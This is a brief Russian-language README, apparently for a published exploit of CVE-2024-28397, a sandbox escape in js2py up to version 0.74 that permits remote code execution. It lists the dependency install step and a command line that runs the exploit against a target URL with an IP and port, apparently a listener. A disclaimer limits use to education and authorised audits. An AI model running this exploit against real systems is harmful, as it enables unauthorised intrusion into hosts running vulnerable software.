
js2py <= 0.74 песочница побег (CVE-2024-28397)
Эксплойт для удаленного выполнения команд (RCE) путем побега из песочницы в js2py <= 0.74.
Позволяет выполнять произвольный код на хост-системе через небезопасное выполнение JavaScript.
subprocess.PopenЗависимости:
pip install -r requirements.txt
python3 exploit.py -U http://target_url -H IP -P PUERTO
Этот проект предоставляется исключительно в образовательных целях и для авторизованных аудитов безопасности.
Автор не несет ответственности за неправомерное использование этого инструмента.